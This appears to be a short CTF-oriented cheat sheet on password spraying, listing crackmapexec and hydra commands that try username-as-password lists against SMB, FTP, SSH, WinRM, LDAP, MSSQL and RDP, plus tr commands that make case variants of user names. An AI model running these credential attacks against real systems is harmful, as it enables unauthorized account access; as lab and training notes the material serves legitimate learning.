Password Attack

Password Spray

Only CTF - SMB (139,445) - Checking login == password using wordlist

# Try same username and password
crackmapexec smb $RHOST -u usernames.txt -p usernames.txt
crackmapexec smb $RHOST -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success

# Try different protocols with no brute force 
for p in 'ftp' 'ssh' 'smb' 'winrm' 'ldap' 'mssql'; do cme $p $RHOST -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success; done

# RDP 
hydra -V -f -L usernames.txt -P usernames.txt rdp://10.0.2.5 -V

# Try adding some updates on lower and upper cases (e.g. Ryan, ryan, RYAN)

tr '[:lower:]' '[:upper:]' < users.txt > users2.txt
tr '[:upper:]' '[:lower:]' < users.txt >> users2.txt
crackmapexec smb $RHOST -u users2.txt -p users2.txt

AD Password Spray

Sprayhound

Bruteforce Attack

cme + rockyou.txt

Last updated